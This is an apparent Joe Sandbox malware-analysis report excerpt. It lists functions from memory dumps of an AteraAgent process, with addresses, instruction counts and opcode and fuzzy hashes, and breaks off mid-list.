                                                                                                                                                                                                                                                                                                Function 00007FFD9B3998B8 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-1129347711
                                                                                                                                                                                                                                                                                                • Opcode ID: 79b196c7d1f878ce1aa958f78ff2fcd7b6b91d365dacfb65dce52f7aefd5b30d
                                                                                                                                                                                                                                                                                                • Instruction ID: 2c31b8bd1ec1a553391aac518c8842f17afdb7e3a6f6029fb1a72d53c45c7c84
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79b196c7d1f878ce1aa958f78ff2fcd7b6b91d365dacfb65dce52f7aefd5b30d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB31CA3150EBC58FC7579B3898A06903FF0EF07210B1A44DBC489CB1B3E6689C4AC762
                                                                                                                                                                                                                                                                                                Function 00007FFD9B39549D Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: `uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-1275621395
                                                                                                                                                                                                                                                                                                • Opcode ID: 6c4e5ea98f0825507f0610d82afc32629a1f8c4734b499d4410308757cfb79b5
                                                                                                                                                                                                                                                                                                • Instruction ID: ce6008c3c6f18e2fb8f7314ac4fdecde412b61de6cb5674affbfb17026603d9b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c4e5ea98f0825507f0610d82afc32629a1f8c4734b499d4410308757cfb79b5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5211033170EB8D4FD7A9EB5C88A5A767BD0FB56310B0601BEE44DC71A3EA19E9418350
                                                                                                                                                                                                                                                                                                Function 00007FFD9B3955FD Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: X9uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-3546979109
                                                                                                                                                                                                                                                                                                • Opcode ID: 175064b021ece1fc7b9ef666427d6bacc8f3a5a0d332a9c7dbd0796216fbfc73
                                                                                                                                                                                                                                                                                                • Instruction ID: 0a2dedea6a1ca44865716fa61e339f2ef41eb2390d5019d7044cb548dd2df4c6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 175064b021ece1fc7b9ef666427d6bacc8f3a5a0d332a9c7dbd0796216fbfc73
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2811382170E7891FE362E66998556B27BD4EF56350B0700FFE488C71A3CC085C864361
                                                                                                                                                                                                                                                                                                Function 00007FFD9B393230 Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: @uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-1269069093
                                                                                                                                                                                                                                                                                                • Opcode ID: 669428d108346cca2c79e1fdbc7451681644e9586c14f2a06c84afbc24963da7
                                                                                                                                                                                                                                                                                                • Instruction ID: 62a57ed0706782516b33b9d5d43ca624527984cdeac5a9eec7503e6fe5c73acf
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 669428d108346cca2c79e1fdbc7451681644e9586c14f2a06c84afbc24963da7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE019230A09B488FD7A4EB288054A667BD1EFD4315F04097EE889C7270DE34E6458781
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38A118 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: 8uR
                                                                                                                                                                                                                                                                                                • API String ID: 0-2899704457
                                                                                                                                                                                                                                                                                                • Opcode ID: f2eddbda3e3bad0be78a99deb3be2876a3b535c9ec4f9506814ff08b868d3b13
                                                                                                                                                                                                                                                                                                • Instruction ID: 780c0b7195436204a96d0c9faa946cf239a26cac691de864fe62c7c198e7f60a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2eddbda3e3bad0be78a99deb3be2876a3b535c9ec4f9506814ff08b868d3b13
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0AF0E971D1694C4FEB95EFA484A50EC7FA0EF58200F4101AAD809C3161EE7156858701
                                                                                                                                                                                                                                                                                                Function 00007FFD9B597450 Relevance: .6, Instructions: 570COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: aa8939b6c45edc6698381a472419fcd43afe55b5e3a7334992c0092fe8702e98
                                                                                                                                                                                                                                                                                                • Instruction ID: 75455310e3ab9273af5f2d7f0cd29636ee62a0ae30886abbb97f3aa110f67045
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa8939b6c45edc6698381a472419fcd43afe55b5e3a7334992c0092fe8702e98
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2F1E331B09A4E4FEBE5DB2C8864BA573E2FF99740F4500B6D41DC72AADF24AD428741
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38A020 Relevance: .5, Instructions: 469COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: baf2c57a6af0c5a8875f24615cfd7ca03d10b7513f92d80fc618dbac802a38ac
                                                                                                                                                                                                                                                                                                • Instruction ID: ba4f45b21407fc6dd16e7fb1641905306ffbe1d14401a105622f4c4cc0f2f1f4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: baf2c57a6af0c5a8875f24615cfd7ca03d10b7513f92d80fc618dbac802a38ac
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8E18171A1DB4D8FE7A8EF188455666B7D2FFA8340F51457EE08DC32A2DF34A8418B42
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38D9E9 Relevance: .4, Instructions: 436COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 33760a460b8870e90218fdbc87e9e8fa0daec9f2b9913d8d7a697ff6084781f9
                                                                                                                                                                                                                                                                                                • Instruction ID: 4b02e510c13b079053f984df1b009eeb0e5a409bd951f74a3a953e237a8997e0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33760a460b8870e90218fdbc87e9e8fa0daec9f2b9913d8d7a697ff6084781f9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97D1663160DF4C4FDB64EB98D451A65B7E1EFA5310F01027ED04DC72A2DE76A846C782
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38A015 Relevance: .4, Instructions: 420COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 27739f8ede1ed90d84c2b9494c1c3b2ef231d94fa76087e6b5cd7cb62a0b0a24
                                                                                                                                                                                                                                                                                                • Instruction ID: fced6d7833f5864fa04195837d360faa8011a85237c343c7a7c2295e245b59b0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27739f8ede1ed90d84c2b9494c1c3b2ef231d94fa76087e6b5cd7cb62a0b0a24
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4ED1B371A19B498FE7B8EB28C469766B7E1FFA8340F41457ED08EC32A1DF34A9418741
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38AAF8 Relevance: .4, Instructions: 405COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 7e118b6c700868868ce03365dcffb0703ef9b8652a79fe04a2d29aecd71c85f7
                                                                                                                                                                                                                                                                                                • Instruction ID: b9e31b3e5b4e337e7ee69689ac264655d13e108a8b95c5b73a0af34b68bd06d3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e118b6c700868868ce03365dcffb0703ef9b8652a79fe04a2d29aecd71c85f7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8EC1A621B1EE4E4FEBA5EBAC447967437D1EF59300B4600BED44DCB2A3EE69AD058341
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38D2FB Relevance: .4, Instructions: 393COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: f284d9cc9e61719791dd1a7d5baa3265a5ec72dc35c576e7c9c1253a6240a1d7
                                                                                                                                                                                                                                                                                                • Instruction ID: 08fa1bf6e519bc368e9ee2eefdbfbe9cbcb660536d52b80a3c629bbaff2070c6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f284d9cc9e61719791dd1a7d5baa3265a5ec72dc35c576e7c9c1253a6240a1d7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6EB14E11F2E69B0AE328B6AC68911F83794FFD2314F55427EC4CBC61EBED19A5474341
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38A7FA Relevance: .4, Instructions: 387COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 6e1ee337ce45274ad84e342c082a2c904631ead38f90e69e81fba63e530893df
                                                                                                                                                                                                                                                                                                • Instruction ID: 0782ca5d2ab215862ae4c8b8b19613af581938793fb551d277b2392764d88a03
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e1ee337ce45274ad84e342c082a2c904631ead38f90e69e81fba63e530893df
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40B1F652B1FECE0BF762A2EC69211F87F51EF4277070903FFD098861E79C596A064292
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38B8E8 Relevance: .3, Instructions: 344COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 0b677594829d98e6fafc6c22680fccbca2bb460215b7c15712b10f36379f32c4
                                                                                                                                                                                                                                                                                                • Instruction ID: 27af32f8b9f37ce6b067f70200c56e6fcf391a8ec96aaa2e2ca4c49af3cba9c2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b677594829d98e6fafc6c22680fccbca2bb460215b7c15712b10f36379f32c4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5EA1392070DA4D0FEBA5FBAC9860AB577E1EF49310B1541BEC48DC71E7DE28A846C341
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38A030 Relevance: .3, Instructions: 338COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: a38cafee57238efa3da44581a2bba5172776aaee44de2dc0bbabdf698aeff9ce
                                                                                                                                                                                                                                                                                                • Instruction ID: 43a31fc805ca96614b82e379c50e19d1e278c3a6c64ee1ae2104ab39b6930c22
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a38cafee57238efa3da44581a2bba5172776aaee44de2dc0bbabdf698aeff9ce
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13910761B1DD4D8FEBA8FA2C946566837D2EF98350B0501BEE44DC72E6EE14AD418381
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38DE79 Relevance: .3, Instructions: 329COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 79f76a84ed074825635ee993987cebbe4c6f2c6e3c428018a117f88fe19894be
                                                                                                                                                                                                                                                                                                • Instruction ID: f5ea5584aedec443e36a5c59edd1ad044e7bc74a0420f8869fadb8c75cba99c7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79f76a84ed074825635ee993987cebbe4c6f2c6e3c428018a117f88fe19894be
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6913771B1DE890FF759EA6C986597437D1EFA9740B0101BEE089C72A7ED34EC428742
                                                                                                                                                                                                                                                                                                Function 00007FFD9B59EA9D Relevance: .3, Instructions: 323COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 8c8cc01c040a0a644bfe1be3e46122c9286968ecf74143a20fc034480f36942d
                                                                                                                                                                                                                                                                                                • Instruction ID: e6e08b1aa033532cfa080ff40c81896533657f6e7ec585d237e2631b0c319f47
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c8cc01c040a0a644bfe1be3e46122c9286968ecf74143a20fc034480f36942d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ACA16D30B0E68A4FF3AA977844651B47BE1EF82310F6581BED4DAC71E7DD28694A8341
                                                                                                                                                                                                                                                                                                Function 00007FFD9B394894 Relevance: .3, Instructions: 306COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 8c68a621fbb81583b541cf248b5cb14687e2c0eb419bc792d9bbd3829eec36a1
                                                                                                                                                                                                                                                                                                • Instruction ID: 4b6eb540a4cb9e145784a4ee007481ee4ab85750df4d49cc9166f49e8fcc269e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c68a621fbb81583b541cf248b5cb14687e2c0eb419bc792d9bbd3829eec36a1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00910531B29B4A8FE778EF6C94A55A673D1FF54310B54067DD09AC32A6EE34F8428780
                                                                                                                                                                                                                                                                                                Function 00007FFD9B395760 Relevance: .3, Instructions: 304COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 531b08629be6b62cdb140378a51754f2368d4e64aedf307d27de12a222a5879b
                                                                                                                                                                                                                                                                                                • Instruction ID: ccafc8a33e62039b0859133bb1eacbaf69256265f43745ead1967003de1b656f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 531b08629be6b62cdb140378a51754f2368d4e64aedf307d27de12a222a5879b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5812B12B0FB9A4FF776E6AD58B51B53BD0EFA126170701BBD089CA5A3EC046D874341
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38A6C0 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: e5846a7446a2d91a12be06a316d73388ae3a003f8b46c910f50875ffe175b4fd
                                                                                                                                                                                                                                                                                                • Instruction ID: ba468e5d86a5ef5a20e4484bba98afe2ca826416a652661540ba34a4db951479
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5846a7446a2d91a12be06a316d73388ae3a003f8b46c910f50875ffe175b4fd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E810762B1DE4A0FE768E66C54661B937D1EF99364B0501BED05EC32E7FD25AC034342
                                                                                                                                                                                                                                                                                                Function 00007FFD9B387DB9 Relevance: .3, Instructions: 285COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ef66a92415a860a8499b65c05e6b2dcd37550b073de2ceb1afa479f1add249f4
                                                                                                                                                                                                                                                                                                • Instruction ID: 7cddb203d98508fd73a8004706b3855babb1db466cd78b25fb42edaad926a2a6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef66a92415a860a8499b65c05e6b2dcd37550b073de2ceb1afa479f1add249f4
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2391E571E0AA4E8FEBA8EFA8C8656ADB7E2FF54340F01067DE019D3196DE346D018741
                                                                                                                                                                                                                                                                                                Function 00007FFD9B5A2F48 Relevance: .3, Instructions: 269COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 796012b1fe89bdfd2299189f7d926f8f181bb122bf4912f18552bcc4f06ab769
                                                                                                                                                                                                                                                                                                • Instruction ID: efc962f905c24e5da81243dfee7352ac3fc851c98b476b5e1bb2ff59de82fb18
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 796012b1fe89bdfd2299189f7d926f8f181bb122bf4912f18552bcc4f06ab769
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 69919570A0DA8D8FDFD6DF68C4A59A93BE1FF69310B0500AAE449D72A2DA34AC41C741
                                                                                                                                                                                                                                                                                                Function 00007FFD9B384610 Relevance: .3, Instructions: 265COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: dd48a83d8c03763d5db20a987f4e7c31ba1317019cac5d0e37c2354c583aaba5
